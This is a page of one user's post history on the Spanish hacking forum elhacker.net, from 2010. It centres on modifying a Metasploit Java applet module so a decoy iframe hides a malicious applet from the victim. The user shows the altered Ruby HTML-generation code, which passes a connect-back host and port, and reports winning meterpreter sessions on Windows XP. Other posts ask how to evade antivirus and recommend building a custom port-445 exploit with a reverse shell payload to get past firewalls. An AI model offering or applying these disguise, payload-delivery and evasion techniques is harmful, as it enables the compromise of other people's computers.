elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 [3] 4
21  Seguridad Informática / Hacking / Re: [Iniciación]Explotación de vulnerabilidades teoria + práctica en: 3 Abril 2010, 22:56 pm
Pero que pasa con el ms08_67!!! tenía entendido que esta un poco obsoleto!
Realmente funciona contra un Windows actualizao??
22  Seguridad Informática / Hacking / Re: windows XP 445 en: 3 Abril 2010, 00:54 am
Y entonces que consigues con analizar un servicio con un fuzzer???
http://en.wikipedia.org/wiki/Fuzz_testing

buff!! Parece un poco complicao
intentare hacer pruebas con metasploit que me parece que lleva algún tipo de fuzzer
23  Seguridad Informática / Hacking / Re: windows XP 445 en: 2 Abril 2010, 23:50 pm
Entendido. Gracias.
Y entonces que consigues con analizar un servicio con un fuzzer???
Es posible explotar el puerto 445 de un Windows XP completamente parcheado y actualizado?
Analiza el servicio con un fuzzer y busca BoF o SoF para explotarlo y construyete tu propio exploit con algun payload de reverse shell para bypassear parte de los firewalls.

Saludos
24  Seguridad Informática / Hacking / Re: metasploit duda sobre vulnerabilidad 42411 en: 2 Abril 2010, 21:50 pm
No seria la ostia, seria la repolla!! :laugh:
25  Seguridad Informática / Hacking / Re: windows XP 445 en: 2 Abril 2010, 21:40 pm
Lo que no entiendo es porque se ha de construir un exploit personalizado para un determinado s.o.     cuando teóricamente el servicio que corre por el puerto 445 es común en el s.o.
No se si me explico.
26  Seguridad Informática / Hacking / Re: metasploit duda sobre vulnerabilidad 42411 en: 2 Abril 2010, 10:34 am
Pues eso estaría bien!!
27  Seguridad Informática / Hacking / windows XP 445 en: 1 Abril 2010, 23:21 pm
Es posible explotar el puerto 445 de un Windows XP completamente parcheado y actualizado?
28  Seguridad Informática / Hacking / Re: Redireccionar JavaApplet en: 1 Abril 2010, 22:46 pm
Interesante, eh?
pero este modulo de metasploit me parece que no se le puede poner ningun encoder.

No se, ya me diras si a tí te saltan o no los antivirus.
29  Seguridad Informática / Hacking / Re: Redireccionar JavaApplet en: 1 Abril 2010, 22:32 pm
de la 450 a la 459.
Aquí te pongo las ultimas 15 lineas del fichero

def generate_html( data, host, port )
      html  = "<html><head><title>Loading...</title></head>"
      html += "<body>"
      html += "<applet archive=\"#{datastore['APPLETNAME']}.jar\" "
      html += "code=\"#{datastore['APPLETNAME']}.class\" width=\"1\" height=\"1\">"
      html += "<param name=\"data\" value=\"#{data}\"/>" if data
      html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
      html += "<param name=\"lport\" value=\"#{port}\"/>" if port
      html += "</applet>"
      html += "<iframe frameborder='0' width='900' height='1000' src='http://www.google.es'></iframe>"
      html += "</body></html>"      
   return html
   end
end

Hay alguna forma de no hacer saltar el antivirus?
30  Seguridad Informática / Hacking / Re: Redireccionar JavaApplet en: 1 Abril 2010, 22:11 pm
Vas al final del archivo y allí es donde te encuentras las sentencias en ruby para crear el fichero html.
Le añades una sentencia similar a:
html += "<iframe frameborder='0' width='900' height='1000' src='http://www.google.es'></iframe>"

Y cuando abres el metasploit y lo ejecutas, te genera el index.html esperando en el puerto que le hayas indicado.
El resultado es que cuando la víctima abre la página, le sale la ventanita del java applet a la vez que se va cargando el link del iframe. Lo he probado sobre un xp sp3 (sin antivirus) con la ultima version de explorer, firefox y safari y en los 3 el metasplot me ha devuelto el deseado meterpreter. El único problema, és que con un buen antivirus no funciona, porque detecta que alguien se intenta conectar a la máquina. No se si hay alguna forma de que la infección por java pueda ser totalmente indetectable por los antivirus.
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines